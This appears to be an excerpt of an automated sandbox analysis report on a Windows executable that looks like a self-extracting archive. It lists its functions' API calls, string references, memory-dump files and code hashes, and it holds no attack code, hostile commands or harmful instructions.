MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006BABAC,00000001,00000001,2DE85006,?,?,?), ref: 006BAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006BAB35
__freea.LIBCMT ref: 006BAB42

Part of subcall function 006B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006BCA2C,00000000,?,006B6CBE,?,00000008,?,006B91E0,?,?,?), ref: 006B8E38

__freea.LIBCMT ref: 006BAB4B
__freea.LIBCMT ref: 006BAB70

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 48bd16033b32d1d61cbff0a288c3429fe99b0604a69a685ca0bb0c4c2a97f112
Instruction ID: 2e526c4483e79d10f58bb5d0618548992c2d6a7485da0501b6421de421b4b896
Opcode Fuzzy Hash: 48bd16033b32d1d61cbff0a288c3429fe99b0604a69a685ca0bb0c4c2a97f112
Instruction Fuzzy Hash: D251AFB2610216AFDB259EA4CC42EFBB7ABEB44750B15462DFC14D6240EB34DCC0D7A6

Function 006B3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,006B3C35,?,?,006F2088,00000000,?,006B3D60,00000004,InitializeCriticalSectionEx,006C6394,InitializeCriticalSectionEx,00000000), ref: 006B3C03

Strings

api-ms-, xrefs: 006B3BC3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: f64477778e433fd6b9846d6740adf4b665a2c039db1097682a7b70996483b554
Instruction ID: 7ad4c8b14324b3aee54acd81a9483911d4de2afabc39d0a7bea12e0bd836b204
Opcode Fuzzy Hash: f64477778e433fd6b9846d6740adf4b665a2c039db1097682a7b70996483b554
Instruction Fuzzy Hash: A811E3B6B04231ABCB228B68DC41BE937669F11770F210260F815EB394E730EF8087D5

Function 006998E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00697760,?,00000005,?,00000011), ref: 0069995F
GetLastError.KERNEL32(?,?,00697760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0069996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00697760,?,00000005,?), ref: 006999A2
GetLastError.KERNEL32(?,?,00697760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006999AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00697760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006999F9

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 728b716320346266fe700ff865028b2d7362a6d89cadcab09a0ea0f238a983bf
Instruction ID: 28d1a8dfbe3bdfaf2bddd3b51269bcab529833be88cc6ab2a8a6fcfdce2f394b
Opcode Fuzzy Hash: 728b716320346266fe700ff865028b2d7362a6d89cadcab09a0ea0f238a983bf
Instruction Fuzzy Hash: BB3145315443416FEB309F28CC46BEABB9ABB01320F180B1DF9A1966C0D3B5A944CBA4

Function 006AB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006AB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006AB58A
IsDialogMessageW.USER32(000103E4,?), ref: 006AB59E
TranslateMessage.USER32(?), ref: 006AB5AC
DispatchMessageW.USER32(?), ref: 006AB5B6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: d42c858d0b414bf3f800ba876e2d7b99bbd261709579d4232510b3e165438015
Instruction ID: 9e310bc5b49f69385fc4ee75f4b2981826010a5e7d1714e4f58407293e5171fd
Opcode Fuzzy Hash: d42c858d0b414bf3f800ba876e2d7b99bbd261709579d4232510b3e165438015
Instruction Fuzzy Hash: 85F0BD71E0122AAB8B20AFE69C4CDEB7FAEEE063917405415B505D2211EF34D605CBB0

Function 006AABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 006AABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 006AABF9

Part of subcall function 006A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0069C116,00000000,.exe,?,?,00000800,?,?,?,006A8E3C), ref: 006A1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 006AABE9

Strings

EDIT, xrefs: 006AABCD, 006AABD8, 006AABE5

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: f23525329658f807191eb124675c88c3b109a9ee353e09231c1256cb13ded91b
Instruction ID: f412519c6ba6eb6175670f0a5df20aaaef8932bbe1def13b45015b9f3b944c44
Opcode Fuzzy Hash: f23525329658f807191eb124675c88c3b109a9ee353e09231c1256cb13ded91b
Instruction Fuzzy Hash: 7AF089366013287AD72067645C05FEF766E9F47B40F484016B905A6280DB60DE41C9B6

Function 006AAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006A0836
Part of subcall function 006A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0069F2D8,Crypt32.dll,00000000,0069F35C,?,?,0069F33E,?,?,?), ref: 006A0858

OleInitialize.OLE32(00000000), ref: 006AAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 006AAC66
SHGetMalloc.SHELL32(006D8438), ref: 006AAC70

Strings

riched20.dll, xrefs: 006AAC1E

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: a54748f25ce6e92b25a8c0a267eeb360114a2e0fab1efe47183c13a610baed20
Instruction ID: 3c0dac3aa0783fc2660f3c784c5984d231c7d75bb014d29cfa1367e810ed1f91
Opcode Fuzzy Hash: a54748f25ce6e92b25a8c0a267eeb360114a2e0fab1efe47183c13a610baed20
Instruction Fuzzy Hash: 1EF0F9B1D00219ABCB50AFA9D9499EFFBFDEF95700F00415AE415E2241DBB45605CFA1

Function 006ADBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 006ADBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 006ADC30

Strings

sfxcmd, xrefs: 006ADBEF
sfxpar, xrefs: 006ADC2B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c26cae0ccf24c455880f4c43a69b9d8fe683bebbb6cfcf68ad21da26acfbb5c4
Instruction ID: d9d2b26f7305859f4fb020d92db5c8a606fb042aeeaf30f3f5fe7a17c618b3af
Opcode Fuzzy Hash: c26cae0ccf24c455880f4c43a69b9d8fe683bebbb6cfcf68ad21da26acfbb5c4
Instruction Fuzzy Hash: F7F0A7B2404234AADB203B958C0AFFA779EEF06B91B480459BD8796551E6B09D80DAB4

Function 00699785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00699795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 006997AD
GetLastError.KERNEL32 ref: 006997DF
GetLastError.KERNEL32 ref: 006997FE

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 1d16ac24408f6d614d5b27bc0ca790b7e5a135f42037a421349d6494ae44d80b
Instruction ID: 4182e0c7d3b62b0128ac486a8241710a81ea7303929a0907fbd8e8840fc56c6b
Opcode Fuzzy Hash: 1d16ac24408f6d614d5b27bc0ca790b7e5a135f42037a421349d6494ae44d80b
Instruction Fuzzy Hash: 2F117031910214EBDF205FA9C904AF937AFBB56321F10892EE42689B90DB759E449B71

Function 006BAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0069D710,00000000,00000000,?,006BACDB,0069D710,00000000,00000000,00000000,?,006BAED8,00000006,FlsSetValue), ref: 006BAD66
GetLastError.KERNEL32(?,006BACDB,0069D710,00000000,00000000,00000000,?,006BAED8,00000006,FlsSetValue,006C7970,FlsSetValue,00000000,00000364,?,006B98B7), ref: 006BAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006BACDB,0069D710,00000000,00000000,00000000,?,006BAED8,00000006,FlsSetValue,006C7970,FlsSetValue,00000000), ref: 006BAD80

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 50a9ba32f70439b5d22527923264a161018d1aad42fee809b8649b265d7bba15
Instruction ID: e894085701f15fc10c5e4b67ce0be0c818900f48a7a91c5f21d1293f59c44239
Opcode Fuzzy Hash: 50a9ba32f70439b5d22527923264a161018d1aad42fee809b8649b265d7bba15
Instruction Fuzzy Hash: 2D01F776301232ABC7214BA8DC54EEB7B5BEF057A27115620F906D7750DB20D941CBE1

Function 006BBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 006B97E5: GetLastError.KERNEL32(?,006D1030,006B4674,006D1030,?,?,006B3F73,00000050,?,006D1030,00000200), ref: 006B97E9
Part of subcall function 006B97E5: _free.LIBCMT ref: 006B981C
Part of subcall function 006B97E5: SetLastError.KERNEL32(00000000,?,006D1030,00000200), ref: 006B985D
Part of subcall function 006B97E5: _abort.LIBCMT ref: 006B9863

Part of subcall function 006BBB4E: _abort.LIBCMT ref: 006BBB80
Part of subcall function 006BBB4E: _free.LIBCMT ref: 006BBBB4

Part of subcall function 006BB7BB: GetOEMCP.KERNEL32(00000000,?,?,006BBA44,?), ref: 006BB7E6

_free.LIBCMT ref: 006BBA9F
_free.LIBCMT ref: 006BBAD5

Strings

pl, xrefs: 006BBAC9

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: pl
API String ID: 2991157371-1786839575
Opcode ID: 017f249b7175b38849dc3bf63fb970dd1eb13df6cc6257c97be312260e7b9604
Instruction ID: 1358b84327828c92f773d152bce3fb9f50b52e1550e4ecd048ba4426aec8c7a1
Opcode Fuzzy Hash: 017f249b7175b38849dc3bf63fb970dd1eb13df6cc6257c97be312260e7b9604
Instruction Fuzzy Hash: 9E3181B1904209AFDB10DFA8D441BEDB7F6EF40320F25509DE9149B2A2EBB25D81DB54

Function 006B8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 006BBF30: GetEnvironmentStringsW.KERNEL32 ref: 006BBF39
Part of subcall function 006BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006BBF5C
Part of subcall function 006BBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006BBF82
Part of subcall function 006BBF30: _free.LIBCMT ref: 006BBF95
Part of subcall function 006BBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006BBFA4

_free.LIBCMT ref: 006B82AE
_free.LIBCMT ref: 006B82B5

Strings

0"o, xrefs: 006B829B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"o
API String ID: 400815659-2710898283
Opcode ID: 53249ad1f5c91ad39f6fe7b0f2839be9b281f135284c90bd14c151740eaf322d
Instruction ID: 9293e7d947eefb7fc4e76d19fd544a76b52e9ca77338fa21a97139ed97a39f33
Opcode Fuzzy Hash: 53249ad1f5c91ad39f6fe7b0f2839be9b281f135284c90bd14c151740eaf322d
Instruction Fuzzy Hash: 70E0E5A36069524DA6E136392C526FB160F4F81338B54121EF610871C3CE708AC3CFEA

Function 006AE528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE51F

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

2j, xrefs: 006AE519
(j, xrefs: 006AE528

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (j$2j
API String ID: 1269201914-2669103653
Opcode ID: c2a92312ea4ce28bc251a36c009b5d9bc0c785d071e8c73d2b2fdb575aedb5a2
Instruction ID: 1418cbe77b0c49249e2a59835b42599add9084ae5d7b587bdddbf607d6b79f70
Opcode Fuzzy Hash: c2a92312ea4ce28bc251a36c009b5d9bc0c785d071e8c73d2b2fdb575aedb5a2
Instruction Fuzzy Hash: 61B012C1A5C4407C314475492E02D3B090FC1C3F24330802FF509C0180EC430C020C31

Function 00699F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0069D343,00000001,?,?,?,00000000,006A551D,?,?,?), ref: 00699F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,006A551D,?,?,?,?,?,006A4FC7,?), ref: 00699FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0069D343,00000001,?,?), ref: 0069A011

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 30db59685776800dbf86642a841efd82085fe905bf37c9c769cc0b0f7296e74a
Instruction ID: 3a3a3c424cd282beb336494213a1939384ab94c5a0989799dd546d53104fcaad
Opcode Fuzzy Hash: 30db59685776800dbf86642a841efd82085fe905bf37c9c769cc0b0f7296e74a
Instruction Fuzzy Hash: 2931BF31208305AFDF14CF24D818BAAB7ABEB84724F04451DF8859B790CB75AD48CBA2

Function 0069A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 0069C27E: _wcslen.LIBCMT ref: 0069C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A30C
GetLastError.KERNEL32(?,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A329

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: c9fa4d8de16607b0ac1e027df1520e412cd60222242e7849c7d93d0440d79c5b
Instruction ID: c6f72e5ec93892f196ce6f8636c23df54a4450f0b56eafa88d6be4925fb0f914
Opcode Fuzzy Hash: c9fa4d8de16607b0ac1e027df1520e412cd60222242e7849c7d93d0440d79c5b
Instruction Fuzzy Hash: D901D8312002206AEF21AFF54C09FFD33CE9F0A780F144418F901E6A81DB54CA82C6F6

Function 006BB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 006BB8B8

Strings

, xrefs: 006BB8FD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 06fa9a42a98882d494dde44123badbc1ec273c058e081132e67c41f631a6444a
Instruction ID: a3a220a7aa086974ec796b84c933af3a0a3092f1043c418641c0f78378ff8f7e
Opcode Fuzzy Hash: 06fa9a42a98882d494dde44123badbc1ec273c058e081132e67c41f631a6444a
Instruction Fuzzy Hash: 1E411AB090424C9EDB219E64CC84BF6BBBBDB46304F1414ECE5DA86242D3759A85CF60

Function 006BAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 006BAFDD

Strings

LCMapStringEx, xrefs: 006BAF7D, 006BAF87

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
